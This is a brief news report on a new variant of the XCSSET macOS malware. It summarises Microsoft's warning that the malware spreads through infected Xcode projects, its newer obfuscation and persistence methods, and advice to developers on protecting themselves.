A new variant of XCSSET, a known macOS malware, has emerged with improved code obfuscation techniques and updated persistence mechanisms. Microsoft has alerted Apple developers to be cautious as the main infection vector is via Xcode projects. The malware’s capabilities remain largely unchanged, targeting digital wallet contents and gathering data from Notes and other system files.
The new XCSSET variant uses randomization in its encoding methods, making it more difficult to detect using static analysis and threat-hunting rules. Microsoft also noted that the malware now uses Base64 encoding, obfuscates module names, and introduces two new persistence methods: zshrc and dock.
XCSSET has previously targeted Xcode developers, infecting their projects and spreading them to other users through GitHub. The malware’s distribution model is considered “clever” by security researchers. Microsoft advises users to inspect and verify any Xcode projects downloaded from repositories, only install apps from trusted sources, and ensure they have the latest software updates.
The return of XCSSET highlights the need for vigilance among Apple developers and users. As with previous versions, this new malware variant will likely target unsuspecting programmers through infected Xcode projects.
Source: https://www.theregister.com/2025/02/17/macos_xcsset_malware_returns